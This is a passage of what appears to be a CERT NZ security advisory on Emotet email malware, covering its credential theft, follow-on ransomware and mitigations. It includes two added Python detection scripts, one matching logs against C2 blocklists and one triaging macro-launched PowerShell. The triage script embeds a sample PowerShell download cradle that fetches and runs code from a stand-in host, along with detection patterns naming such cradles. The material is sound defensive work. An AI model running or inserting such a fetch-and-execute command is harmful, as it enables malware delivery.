Windows computers, networks and servers.
What this means
CERT NZ has seen an increase in Emotet activity in New Zealand, spreading via email. The emails contain malicious attachments or links that the receiver is encouraged to download. These links and attachments may look like genuine invoices, financial documents, shipping information, resumes, scanned documents, or information on COVID-19, but they are fake.
Emotet is designed to steal login credentials for email accounts configured on infected systems. The compromised credentials are then passed to spam bots, which send out large numbers of spam emails to spread the malware further. Emotet may also steal the contents of your mailbox and use them to send emails from elsewhere; for example, it may reply into an existing email conversation so that the malicious message looks like a legitimate continuation of that thread.
Emotet is also used to install other malware such as Trickbot and QBot onto a system. These may be used to provide access to attackers who carry out network compromise and data exfiltration, and often install ransomware such as Ryuk, Maze, Conti, or ProLock throughout a network.
What to look for
How to tell if you're at risk
Anyone can be targeted by Emotet, including individuals and businesses.
How to tell if you're affected
You may receive emails from people in your contact list advising that they’ve received phishing emails from you containing malware. As malware continues to evolve, anti-virus software does not always detect infections. The following sources provide information which may help you identify infected computers in your environment:
- JPCERT/CC publishes EmoCheck, a tool you can run on a Windows computer to check for an Emotet infection: https://github.com/JPCERTCC/EmoCheck
- Check your egress network logs (HTTP proxy and DNS logs) for any connection to known Emotet command and control (C2) hosts. Feodo Tracker publishes a list of known botnet C2 servers: https://feodotracker.abuse.ch/browse/
- URLhaus publishes a feed of URLs associated with Emotet: https://urlhaus.abuse.ch/browse/tag/emotet/
- The Cryptolaemus group publishes up-to-date information about Emotet, including indicators of compromise (IOCs): https://paste.cryptolaemus.com/
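The egress-log check above can be automated. The following is an added example (not CERT NZ's or abuse.ch's code) that matches a DNS query log and an HTTP proxy access log against a Feodo Tracker-style IP list and a URLhaus-style URL list, and reports which internal clients contacted a listed indicator. The blocklist entries, the log lines and their field layouts (a BIND-style query log, a Squid-style access log, and Feodo CSV columns reduced to first_seen,dst_ip,dst_port,malware) are all constructed for illustration; a real run would use the current abuse.ch exports and your own logs.

```python
"""Match egress DNS and proxy logs against C2 blocklists (added example, not CERT NZ code)."""
import re
from urllib.parse import urlsplit

# Constructed Feodo Tracker-style export, simplified to: first_seen,dst_ip,dst_port,malware
# (documentation address ranges, not real C2 servers).
FEODO_CSV = """\
# constructed sample
2021-01-05 10:00:00,203.0.113.45,8080,Emotet
2021-01-06 08:30:00,198.51.100.17,443,Emotet
2021-01-07 12:00:00,192.0.2.200,7080,TrickBot
"""

# Constructed URLhaus-style URL list (one URL per line, as in the emotet tag feed).
URLHAUS_URLS = """\
# constructed sample
http://docs-invoice.example/wp-content/x9k2/
http://203.0.113.45:8080/
"""

# Constructed BIND-style query log lines (assumed layout): client IP#port, name, type.
DNS_LOG = """\
05-Jan-2021 10:02:11.123 client 10.0.0.23#51234: query: docs-invoice.example IN A + (10.0.0.1)
05-Jan-2021 10:02:12.456 client 10.0.0.23#51240: query: www.example.com IN A + (10.0.0.1)
05-Jan-2021 10:03:01.789 client 10.0.0.41#60001: query: DOCS-INVOICE.EXAMPLE. IN A + (10.0.0.1)
"""

# Constructed Squid-style access.log lines (assumed layout):
# time elapsed client code/status bytes method URL rfc931 hierarchy/peer type
PROXY_LOG = """\
1609840931.512    245 10.0.0.23 TCP_MISS/200 1542 GET http://docs-invoice.example/wp-content/x9k2/ - HIER_DIRECT/198.51.100.17 application/octet-stream
1609840955.002     80 10.0.0.23 TCP_MISS/200 310 POST http://203.0.113.45:8080/ - HIER_DIRECT/203.0.113.45 text/html
1609841000.100     12 10.0.0.50 TCP_HIT/200 9821 GET http://www.example.com/ - HIER_NONE/- text/html
1609841050.300    200 10.0.0.41 TCP_MISS/200 500 GET http://cdn-update.example/ - HIER_DIRECT/192.0.2.200 application/octet-stream
"""

DNS_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\w+)")


def parse_feodo_csv(text):
    """Return {dst_ip: (dst_port, malware_family)} from the simplified CSV; skips comments."""
    ioc = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        _first_seen, ip, port, family = [f.strip() for f in line.split(",")[:4]]
        ioc[ip] = (int(port), family)
    return ioc


def parse_urlhaus(text):
    """Return the set of lower-cased hosts (names or IPs) from a URL list."""
    hosts = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        host = urlsplit(line).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def scan_dns_log(lines, bad_hosts):
    """Flag queries whose name (case-folded, trailing dot removed) is a listed host."""
    hits = []
    for line in lines:
        m = DNS_RE.search(line)
        if not m:
            continue
        qname = m.group("qname").rstrip(".").lower()
        if qname in bad_hosts:
            hits.append(("dns", m.group("client"), qname))
    return hits


def scan_proxy_log(lines, bad_ips, bad_hosts):
    """Flag requests whose URL host, or whose resolved peer IP, is listed."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 9:
            continue
        client, url, hierarchy = fields[2], fields[6], fields[8]
        host = (urlsplit(url).hostname or "").lower()
        peer = hierarchy.split("/", 1)[-1]  # HIER_DIRECT/<ip> -> <ip>
        if host in bad_hosts or host in bad_ips:
            hits.append(("proxy", client, host))
        elif peer in bad_ips:
            hits.append(("proxy", client, peer))
    return hits


def find_infected_hosts(dns_lines, proxy_lines, feodo_csv, urlhaus_text):
    """Return (all hits, sorted internal client IPs that contacted a listed indicator)."""
    bad_ips = parse_feodo_csv(feodo_csv)
    bad_hosts = parse_urlhaus(urlhaus_text)
    hits = scan_dns_log(dns_lines, bad_hosts) + scan_proxy_log(proxy_lines, bad_ips, bad_hosts)
    return hits, sorted({client for _src, client, _ioc in hits})


if __name__ == "__main__":
    hits, clients = find_infected_hosts(DNS_LOG.splitlines(), PROXY_LOG.splitlines(), FEODO_CSV, URLHAUS_URLS)
    for source, client, indicator in hits:
        print(f"{source:5} {client:12} -> {indicator}")
    print("isolate first:", clients)
```

The list of clients is the set of machines to isolate first. Matching on the resolved peer IP as well as on the URL host catches beacons that go straight to an IP address, and folding case and trailing dots avoids missing queries that differ only in form.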
What to do
As Emotet is spread via documents with malicious macros, it is important that you take the following measures:
- Disable macros in Microsoft Office, and only allow macros that are digitally signed or come from trusted locations
- Ensure the anti-virus software on your endpoint devices is active and up to date
- Restrict PowerShell to executing only signed scripts
- Apply the principle of least privilege
- Use mail and web filters to block known Emotet documents and C2 hosts
- Use application whitelisting so that only approved programs can run
If your system has been affected by the Emotet malware, we recommend that you:
- Isolate the infected computer as soon as possible
- Check for any other infected computers in your environment
- Re-image and patch the computer(s)
- Change all credentials, especially local admin and domain admin passwords, as Emotet steals credentials and the follow-on malware it installs uses them to move through the network
- Notify everyone in your contact list and advise them not to open any attachments in emails that appear to have come from you
- Review your mail and web filtering solutions
- Review your anti-virus solution
- Enable PowerShell command logging so that you can detect infected computers
- Maintain an offline backup of your systems
- Segregate your network so that a compromise of one segment cannot spread to the rest
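Once PowerShell and process-creation command-line logging are enabled, the records can be triaged for the launch pattern that a macro document produces: an Office process spawning a script host, frequently with a hidden window and a base64-encoded command. The following is an added example, not CERT NZ tooling. It assumes the events have been exported with parent process, image and command-line fields (as from Windows event 4688 with command-line auditing, or Sysmon event 1); the records, host names and the encoded command are constructed, and the key names are an assumption.

```python
"""Triage process-creation records for macro-style script launches (added example, not CERT NZ code)."""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# "-<flag> <base64 of at least 16 chars>"; the flag is checked separately below.
FLAG_RE = re.compile(r"(?:^|\s)-(\w+)\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_RE = re.compile(r"(?i)-w\w*\s+hidden")           # -w hidden / -WindowStyle hidden
CRADLE_RE = re.compile(r"(?i)\b(?:iex|invoke-expression|net\.webclient|downloadstring|downloadfile|bitsadmin)\b")

# Constructed encoded command: powershell.exe expects UTF-16LE text, base64-encoded.
SAMPLE_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://docs-invoice.example/x9k2/')"
SAMPLE_B64 = base64.b64encode(SAMPLE_CMD.encode("utf-16-le")).decode("ascii")

# Constructed process-creation records (assumed field names).
EVENTS = [
    {"host": "WS-023",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {SAMPLE_B64}"},
    {"host": "WS-041",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"host": "WS-050",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c echo hello"},
]


def _basename(path):
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none / it is malformed."""
    for flag, payload in FLAG_RE.findall(cmdline):
        flag = flag.lower()
        # powershell.exe accepts -e, -ec and any prefix of -EncodedCommand
        if flag in ("e", "ec") or "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(payload).decode("utf-16-le")
            except ValueError:
                return None
    return None


def triage_event(ev):
    """Return host, decoded command (if any) and the reasons the launch looks macro-driven."""
    reasons = []
    parent, image = _basename(ev["parent"]), _basename(ev["image"])
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append("office-parent")
    decoded = decode_encoded_command(ev["cmdline"])
    if decoded is not None:
        reasons.append("encoded-command")
    if HIDDEN_RE.search(ev["cmdline"]):
        reasons.append("hidden-window")
    # Look for a download cradle in the decoded text when present, else in the raw command line.
    if CRADLE_RE.search(decoded or ev["cmdline"]):
        reasons.append("download-cradle")
    return {"host": ev["host"], "reasons": reasons, "decoded": decoded}


def find_suspicious(events):
    """Hosts with at least one triage reason, in log order: candidates for isolation."""
    return [(r["host"], r["reasons"]) for r in map(triage_event, events) if r["reasons"]]


if __name__ == "__main__":
    for host, reasons in find_suspicious(EVENTS):
        print(host, ", ".join(reasons))
```

The Office-parent rule fires even when the command line is innocuous, because a spreadsheet has no business launching cmd.exe; the encoded-command rule decodes the payload so that the analyst sees the actual download cradle rather than a base64 blob. A signed administrative script run from Explorer with -ExecutionPolicy Bypass alone produces no reason, which keeps routine automation out of the queue.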
If you require more information or further support, you can submit a report on our website or contact us on 0800 CERTNZ.
For media enquiries, email our media desk at firstname.lastname@example.org or call the MBIE media team on 027 442 2141.
Bleeping Computer - https://www.bleepingcomputer.com/news/security/emotet-malwares-new-red-dawn-attachment-is-just-as-dangerous/
Darktrace Blog -